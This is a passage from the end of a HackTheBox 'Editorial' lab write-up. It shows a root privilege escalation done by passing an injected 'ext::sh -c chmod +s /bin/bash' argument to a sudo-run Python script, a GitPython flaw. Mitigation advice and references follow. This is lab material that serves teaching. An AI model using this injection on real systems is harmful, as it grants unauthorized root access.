class="n">bin</span><span class="o">/</span><span class="n">python3</span> <span class="o">/</span><span class="n">opt</span><span class="o">/</span><span class="n">internal_apps</span><span class="o">/</span><span class="n">clone_changes</span><span class="o">/</span><span class="n">clone_prod_change.py</span> <span class="s1">&#39;ext::sh -c chmod% +s% /bin/bash&#39;</span> </span></span></code></pre></div><p>I just added the <code>suid</code> bit to the <code>/bin/bash</code> binary. What this does is, no matter who runs this, it will always run as the user who added the <code>suid</code> bit. Now since, the commands were executing as root user, so the <code>suid</code> bit is also set as the root user. So now running this binary, I got the root shell🎉</p> <p><img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/root.png" width="1760" height="284" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/root_hu54ee9cef79c3ea883fe1312a582d270f_82370_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/root_hu54ee9cef79c3ea883fe1312a582d270f_82370_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="619" data-flex-basis="1487px" ></p> <h2 id="mitigation-techniques">Mitigation Techniques </h2><ol> <li><strong>Input Validation and Sanitization</strong>: <ul> <li>Implement strict input validation to ensure that only valid image URLs are accepted.</li> <li>Use allowlists to permit only certain trusted domains for URL inputs.</li> <li>Reject any URLs that attempt to access internal resources.</li> </ul> </li> <li><strong>Server-Side Request Forgery (SSRF) Prevention</strong>: <ul> <li>Employ network-level protections, such as firewall rules, to prevent internal services from being accessed via SSRF.</li> <li>Use tools or libraries that can detect and block SSRF attempts.</li> </ul> </li> <li><strong>Credential Management</strong>: <ul> <li>Ensure that credentials are stored securely and are not exposed in any accessible location, such as commit history in .git folders.</li> <li>Regularly rotate credentials and enforce strong password policies.</li> <li>Use environment variables or secrets management services to handle sensitive information.</li> </ul> </li> <li><strong>Secure SSH Configuration</strong>: <ul> <li>Limit SSH access to necessary users and use key-based authentication instead of passwords.</li> <li>Regularly audit and update SSH configurations to follow best practices.</li> </ul> </li> <li><strong>Sudo Configuration</strong>: <ul> <li>Minimize the number of users with sudo privileges and enforce the principle of least privilege.</li> <li>Restrict the execution of potentially dangerous scripts and commands through sudo.</li> <li>Monitor and log sudo usage to detect any unusual activities.</li> </ul> </li> <li><strong>Secure Code Practices</strong>: <ul> <li>Ensure that scripts and applications do not accept untrusted input without proper validation.</li> <li>Review and sanitize input arguments passed to any subprocess or external command execution.</li> <li>Regularly update and patch all libraries and dependencies to mitigate known vulnerabilities.</li> </ul> </li> </ol> <h2 id="conclusion">Conclusion </h2><p>The penetration test uncovered multiple security vulnerabilities that could be exploited to gain unauthorized access and escalate privileges within the system. Key findings included an SSRF vulnerability that led to internal network exposure, improper handling of credentials, and insecure sudo configurations. This was really a fun box. showed common usual exploits that are out in the open.</p> <h2 id="references">References </h2><ol> <li><a class="link" href="https://caido.io/" target="_blank" rel="noopener" >https://caido.io/</a></li> <li><a class="link" href="https://gchq.github.io/CyberChef/" target="_blank" rel="noopener" >https://gchq.github.io/CyberChef/</a></li> <li><a class="link" href="https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858" target="_blank" rel="noopener" >https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858</a></li> </ol>